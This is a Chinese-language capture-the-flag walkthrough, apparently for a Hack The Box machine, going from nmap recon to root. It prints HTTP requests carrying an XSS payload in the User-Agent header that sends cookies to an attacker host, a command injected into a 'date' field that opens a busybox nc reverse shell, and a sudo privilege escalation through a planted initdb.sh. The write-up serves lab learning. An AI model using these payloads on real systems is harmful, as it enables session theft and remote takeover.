Recon:

1
nmap 10.10.11.8 --min-rate 2000 -Pn -p1-10000 -sT -n
image-20240802181916218 
1
nmap 10.10.11.8 -p22,53,5000 -sC -sV -Pn
image-20240802182203155

GetShell:

在5000端口上运行着一个web服务:

image-20240802182317917

打开是一个给后端传递信息的接口,如果故意在session中填一些payload,会提示:

image-20240802183050472

如果填正常的,即什么都没有发生:

image-20240802183119618

可以利用回显字段来尝试xss:

image-20240802183452990

将user-agent进行更改:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /support HTTP/1.1
Host: 10.10.11.8:5000
Content-Length: 115
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
Origin: http://10.10.11.8:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: <script>alert(1)</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.11.8:5000/support
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

fname=test&lname=test&email=kali%40kali.com&phone=12345678901&message=%3Cscirpt%3Ealert%28%221%22%29%3C%2Fscript%3E

image-20240802184342090

构造数据包:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /support HTTP/1.1
Host: 10.10.11.8:5000
Content-Length: 115
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
Origin: http://10.10.11.8:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: <script>var i=new Image(); i.src="http://10.10.16.44/?cookie="+btoa(document.cookie);</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.11.8:5000/support
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

fname=test&lname=test&email=kali%40kali.com&phone=12345678901&message=%3Cscirpt%3Ealert%28%221%22%29%3C%2Fscript%3E
image-20240802184527966 image-20240802184941749

携带cookie访问目录:

image-20240802185105102 image-20240802185235261

burp抓包,在时间后边输入common,可以进行rce:

image-20240802185309507

反弹shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /dashboard HTTP/1.1
Host: 10.10.11.8:5000
Content-Length: 24
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
Origin: http://10.10.11.8:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.11.8:5000/dashboard
Accept-Encoding: gzip, deflate, br
Cookie: is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
Connection: keep-alive

date=2023-09-15;busybox nc 10.10.16.44 443 -e sh
image-20240802185433689

GetRoot:

发现提权向量:

image-20240802185518654 image-20240802185735496

在当前目录创建initdb.sh文件:

1
echo -e '#!/bin/bash\n/bin/bash' > initdb.sh

运行sudo获取root:

image-20240802185941903